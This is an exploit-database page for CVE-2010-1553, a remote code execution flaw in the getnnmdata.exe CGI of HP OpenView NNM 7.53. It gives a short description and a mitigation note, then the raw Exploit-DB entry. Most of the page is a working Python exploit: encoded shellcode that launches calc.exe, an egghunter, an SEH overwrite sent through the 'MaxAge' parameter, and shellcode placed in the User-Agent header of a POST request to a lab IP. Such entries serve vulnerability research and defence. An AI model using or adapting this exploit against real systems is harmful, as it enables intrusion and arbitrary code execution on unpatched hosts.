header-logo
Suggest Exploit
vendor:
HP OpenView NNM
by:
S2 Crew
9.3
CVSS
CRITICAL
Remote Code Execution
20
CWE
Product Name: HP OpenView NNM
Affected Version From: 7.53
Affected Version To: 7.53
Patch Exists: YES
Related CWE: CVE-2010-1553
CPE: a:hp:openview_nnm:7.53
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0137/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-0062/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2012-1201/
Other Scripts:
Platforms Tested: Windows 2003
2010

HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution

This exploit allows remote attackers to execute arbitrary code on vulnerable installations of HP OpenView NNM. The vulnerability is caused by a boundary error in the 'MaxAge' parameter of the 'getnnmdata.exe' CGI script. By sending a specially crafted HTTP request, an attacker can exploit this vulnerability to execute arbitrary code on the target system.

Mitigation:

HP has released a security patch to address this vulnerability. Users are advised to apply the latest patch to mitigate the risk.
Source

Exploit-DB raw data:

# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution 
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1553

# Code :

#!/usr/bin/python

import struct
import socket
import httplib
import urllib

# calc.exe Windows Execute Command
sc2 = (
"\x89\xe7\xdb\xc4\xd9\x77\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x47\x70\x43\x30\x45\x50\x51\x70\x4f\x79"
"\x4d\x35\x50\x31\x4b\x62\x43\x54\x4e\x6b\x51\x42\x46\x50\x4e"
"\x6b\x50\x52\x46\x6c\x4e\x6b\x51\x42\x46\x74\x4c\x4b\x43\x42"
"\x47\x58\x46\x6f\x4f\x47\x42\x6a\x46\x46\x44\x71\x4b\x4f\x44"
"\x71\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x46\x62\x44\x6c"
"\x45\x70\x4f\x31\x48\x4f\x44\x4d\x47\x71\x4a\x67\x4a\x42\x4c"
"\x30\x43\x62\x46\x37\x4c\x4b\x50\x52\x44\x50\x4c\x4b\x42\x62"
"\x45\x6c\x45\x51\x4e\x30\x4c\x4b\x47\x30\x50\x78\x4e\x65\x4b"
"\x70\x43\x44\x43\x7a\x43\x31\x4a\x70\x46\x30\x4e\x6b\x51\x58"
"\x42\x38\x4c\x4b\x46\x38\x47\x50\x43\x31\x4b\x63\x4b\x53\x47"
"\x4c\x42\x69\x4c\x4b\x45\x64\x4c\x4b\x45\x51\x4a\x76\x46\x51"
"\x4b\x4f\x45\x61\x49\x50\x4c\x6c\x4a\x61\x48\x4f\x44\x4d\x45"
"\x51\x4a\x67\x47\x48\x4b\x50\x44\x35\x4b\x44\x44\x43\x43\x4d"
"\x4a\x58\x47\x4b\x43\x4d\x51\x34\x51\x65\x4d\x32\x42\x78\x4c"
"\x4b\x43\x68\x47\x54\x47\x71\x4a\x73\x51\x76\x4c\x4b\x46\x6c"
"\x50\x4b\x4e\x6b\x42\x78\x45\x4c\x45\x51\x49\x43\x4c\x4b\x47"
"\x74\x4e\x6b\x47\x71\x4e\x30\x4d\x59\x47\x34\x46\x44\x44\x64"
"\x51\x4b\x43\x6b\x50\x61\x42\x79\x42\x7a\x50\x51\x49\x6f\x49"
"\x70\x43\x68\x51\x4f\x51\x4a\x4e\x6b\x45\x42\x4a\x4b\x4d\x56"
"\x43\x6d\x50\x6a\x47\x71\x4c\x4d\x4c\x45\x4e\x59\x45\x50\x45"
"\x50\x45\x50\x50\x50\x43\x58\x45\x61\x4e\x6b\x42\x4f\x4b\x37"
"\x4b\x4f\x4a\x75\x4d\x6b\x4c\x30\x4c\x75\x49\x32\x42\x76\x50"
"\x68\x4d\x76\x4a\x35\x4f\x4d\x4f\x6d\x4b\x4f\x49\x45\x47\x4c"
"\x43\x36\x51\x6c\x45\x5a\x4b\x30\x49\x6b\x4b\x50\x43\x45\x45"
"\x55\x4d\x6b\x42\x67\x47\x63\x51\x62\x42\x4f\x50\x6a\x45\x50"
"\x51\x43\x4b\x4f\x4b\x65\x45\x33\x43\x51\x50\x6c\x45\x33\x46"
"\x4e\x43\x55\x51\x68\x50\x65\x43\x30\x45\x5a\x41\x41"
)

egghunter = (
"\x89\xe1\xda\xd7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x50\x66\x4f\x71\x4b\x7a\x49\x6f\x46\x6f\x50\x42\x51\x42\x43"
"\x5a\x45\x52\x43\x68\x48\x4d\x46\x4e\x45\x6c\x47\x75\x42\x7a"
"\x44\x34\x48\x6f\x4e\x58\x42\x74\x50\x30\x46\x50\x42\x77\x4c"
"\x4b\x4a\x5a\x4e\x4f\x43\x45\x4a\x4a\x4c\x6f\x43\x45\x4a\x47"
"\x49\x6f\x4b\x57\x41\x41"
)

ret = struct.pack('<L',0x5A667A77) # ppr
jmp = "\x74\x21\x44\x44"

p = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter

h = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}

c = httplib.HTTPConnection('172.16.29.149')
c.request("POST","/OvCgi/getnnmdata.exe",p,h)
r = c.getresponse()

print r.status, r.reason
data = r.read()
print data
c.close()

print "\nDone\n"

Navigation

Suggest Exploit

Services By CQR